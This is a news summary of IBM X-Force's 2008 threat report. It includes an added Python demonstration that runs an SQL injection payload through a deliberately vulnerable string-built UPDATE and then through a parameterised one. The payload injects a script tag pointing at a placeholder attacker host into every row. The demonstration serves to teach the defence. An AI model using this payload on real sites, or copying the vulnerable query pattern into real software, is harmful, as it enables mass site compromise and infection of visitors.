Companies their own worst enemy says IBM X-Force report

The problem, says the X-Force annual report, is that companies' own Internet resources are increasingly being used against them, a new twist on the 'enemy within', Infosecurity notes.

The report identifies two main trends in IT security in 2008:

Firstly, Web sites have become the weak point in corporate IT security. Attackers, says IBM, are increasingly compromising Web applications in order to use them to infect the machines of the end users who visit them.

Compounding this, companies run off-the-shelf applications that carry multiple known vulnerabilities or, perhaps worse, develop custom applications that may contain any number of unknown vulnerabilities for which no vendor patch will ever arrive, so conventional patch management cannot fix them.

During 2008, IBM says, more than half of all vulnerabilities disclosed related to Web applications, and of these more than 74 per cent had no patch available.

The report links this trend to the rise of automated SQL injection attacks, which emerged in early 2008 and have grown in number to the point where they represent a major threat to companies.
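The following is an added example, not code from the IBM report or from Infosecurity, showing the mechanism those automated attacks relied on: a Web application that builds an UPDATE statement from user input by string formatting, so one crafted field value rewrites every row in a table and appends a script tag that will later be served to visitors, beside the same handler using a parameterised query. The table, column names, the sample rows, the attacker host and the payload are all constructed for the demonstration.

```python
"""Added example: string-built UPDATE vs. parameterised UPDATE in SQLite."""
import sqlite3

# Constructed sample catalogue; table and column names are assumptions.
ROWS = [
    (1, "Widget", "A plain widget."),
    (2, "Gadget", "A shiny gadget."),
    (3, "Gizmo", "A clever gizmo."),
]

# Assumed attacker payload in the style of the 2008 mass-injection campaigns:
# it closes the string literal, appends a script tag to the column's existing
# value, widens the WHERE clause to every row and comments out the rest.
SCRIPT_TAG = '<script src="http://attacker.invalid/x.js"></script>'
PAYLOAD = "' || blurb || '" + SCRIPT_TAG + "' WHERE 1=1 --"


def fresh_db():
    """In-memory SQLite database seeded with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, blurb TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    db.commit()
    return db


def set_blurb_vulnerable(db, product_id, blurb):
    """Builds the statement with string formatting: the input becomes SQL.

    With PAYLOAD the statement that actually runs is
    UPDATE products SET blurb = '' || blurb || '<script ...>' WHERE 1=1 --' WHERE id = 1
    which touches every row, not just the intended one.
    """
    sql = "UPDATE products SET blurb = '%s' WHERE id = %d" % (blurb, product_id)
    db.execute(sql)
    db.commit()


def set_blurb_safe(db, product_id, blurb):
    """Binds the input as a parameter: the driver never parses it as SQL."""
    db.execute("UPDATE products SET blurb = ? WHERE id = ?", (blurb, product_id))
    db.commit()


def blurbs(db):
    """Current blurb of every product, ordered by id."""
    return [row[0] for row in db.execute("SELECT blurb FROM products ORDER BY id")]


def rows_ending_with_script(db):
    """Rows whose blurb now ends in a script tag, i.e. rows the injected UPDATE rewrote."""
    return sum(1 for b in blurbs(db) if b.endswith("</script>"))


def demo():
    """Run the same payload through both handlers and report the damage."""
    vuln = fresh_db()
    set_blurb_vulnerable(vuln, 1, PAYLOAD)   # intended to change only id 1
    safe = fresh_db()
    set_blurb_safe(safe, 1, PAYLOAD)
    # (rows infected via the vulnerable handler, rows infected via the safe
    # handler, whether the safe handler stored the payload as inert text)
    return rows_ending_with_script(vuln), rows_ending_with_script(safe), blurbs(safe)[0] == PAYLOAD


if __name__ == "__main__":
    print(demo())   # (3, 0, True)
```

Parameterisation keeps the payload as data, so only the intended row changes and its new value is the literal string the attacker sent. That string still contains `<script`, which is why output encoding when the value is rendered into a page remains a separate, necessary control; the parameterised query alone stops the database-wide rewrite, not a stored XSS in a single field.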

The second major trend that IBM X-Force reveals in its annual report is that, although attackers still focus on Web browsers and ActiveX controls as an avenue of attack, they are also turning to newer client-side technologies such as Flash applets as a way past company IT security safeguards.

In Q4 2008 alone, IBM X-Force says it logged more than 50 per cent more malicious URLs hosting exploits than its researchers saw during the whole of 2007.

Other key findings of the report were:
2008 was the busiest year yet for vulnerability disclosures, up 13.5 per cent on 2007.

At the end of 2008, 53 per cent of all vulnerabilities disclosed during the year had no vendor-supplied patch. Nor is the backlog being cleared: 46 per cent of the vulnerabilities disclosed in 2006 and 44 per cent of those disclosed in 2007 were still without a patch at the end of 2008.

The shutdown of the McColo hosting provider late in the year had the biggest single impact on spam in 2008, affecting not only the volume of spam but also the type sent and the countries it was sent from.

China emerged as the top spam-sending country immediately after the McColo shutdown, but had been replaced by Brazil by the end of the year. For some time before the shutdown, the US had held the dubious honour of first place in the spam charts.

Phishers continue to target financial institutions: nearly 90 per cent of phishing attacks were aimed at them, the majority at institutions in North America.
